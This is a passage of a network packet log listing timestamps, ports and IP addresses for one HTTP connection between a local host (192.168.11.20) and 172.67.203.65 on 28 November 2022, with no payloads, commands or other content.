Nov 28, 2022 12:46:58.165458918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165555000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165565968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165576935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165587902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165599108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165610075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165620089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165631056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165635109 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.165642023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165652037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165663004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165810108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165815115 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.165821075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165832043 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165843010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165853977 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165863991 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165877104 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165888071 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165899038 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165909052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165920019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165930033 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.165951014 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.166065931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166078091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166088104 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166099072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166110039 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166120052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166121960 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.166131020 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166141987 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166152000 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166162968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166173935 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166184902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166196108 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166212082 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166223049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166282892 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.166320086 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166332006 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166342020 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166352987 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166363001 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166373968 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166383982 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166394949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166405916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166415930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166425943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166435957 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.166436911 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166448116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166459084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166573048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166584015 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166595936 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166609049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166620016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166630983 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166641951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166651964 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166661024 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.166662931 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166673899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166685104 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166695118 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166706085 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166717052 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166727066 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166743040 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166754961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166755915 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.166765928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166776896 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166826010 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166840076 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166850090 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.166851997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166862011 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166872978 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166883945 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166894913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166904926 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166915894 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166925907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166935921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166946888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166956902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166968107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.166985035 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.167078972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167089939 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167100906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167110920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167121887 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167133093 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167135000 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.167144060 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167154074 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167165041 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167176008 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167182922 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.167186022 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167196989 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167212009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167224884 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167236090 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167247057 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167259932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167318106 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.167330980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167342901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167352915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167363882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167375088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167386055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167390108 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.167397022 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167407036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167418003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167428970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167438984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167449951 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167460918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167470932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167480946 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167494059 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167505026 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167530060 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.167587042 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167599916 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167609930 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167620897 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167629004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167643070 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167654037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167659998 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.167664051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167675018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167685032 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167695999 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167706966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167716980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167727947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167737961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167749882 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.167839050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167850018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167860985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167870998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167881966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167892933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167903900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167913914 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167924881 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167934895 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167946100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167948008 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.167957067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167967081 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167978048 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167989016 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.167998075 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168014050 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168082952 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.168093920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168107986 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168119907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168131113 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168140888 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168152094 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168163061 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168174028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168184996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168195009 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168205976 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168215990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168226957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168298960 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.168349028 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168360949 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168370962 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168380976 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168391943 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168402910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168406963 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.168414116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168423891 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168435097 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168445110 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168456078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168467045 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168483019 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168514967 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.168601036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168612957 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168622971 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168633938 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168644905 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168656111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168658972 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.168667078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168677092 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168688059 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168698072 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168709040 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168720007 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168730021 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168790102 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.168838024 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.168855906 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168868065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168878078 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168889046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168900013 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168910027 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168920994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168931961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168948889 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168962955 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168973923 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168975115 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.168984890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.168997049 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169008017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169018984 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169028997 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169044018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169083118 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.169111967 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169122934 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169133902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169145107 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169154882 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169166088 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169177055 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169188023 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169198036 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169209003 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169222116 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169233084 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169244051 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169255018 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169307947 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.169365883 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169377089 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169388056 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169398069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169409037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169420004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169430017 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169440985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169450998 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169464111 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169478893 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169483900 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.169490099 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169549942 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.169620037 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169631004 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169641972 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169651985 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169662952 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169673920 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169683933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169693947 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.169694901 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169706106 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169717073 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169727087 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169738054 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169748068 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169760942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169771910 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169783115 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169794083 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169804096 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169815063 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169872046 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169883966 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169892073 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.169893980 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169904947 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169915915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169925928 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169941902 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169954062 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169964075 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.169965029 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169975996 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.169991970 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170003891 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170089960 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.170126915 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170135975 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170146942 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170156956 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170167923 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170178890 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170190096 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170200109 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170211077 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170222044 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170233965 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170244932 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170255899 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170260906 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.170267105 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170277119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170288086 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170298100 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170309067 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170351028 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.170381069 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170392990 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170404911 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.170409918 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170420885 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170432091 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170444012 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170455933 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170466900 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170476913 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170488119 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170500994 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170511961 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170636892 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170648098 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170648098 CET	49836	80	192.168.11.20	172.67.203.65
Nov 28, 2022 12:46:58.170659065 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170669079 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170682907 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170692921 CET	80	49836	172.67.203.65	192.168.11.20
Nov 28, 2022 12:46:58.170752048 CET	49836	80	192.168.11.20	172.67.203.65
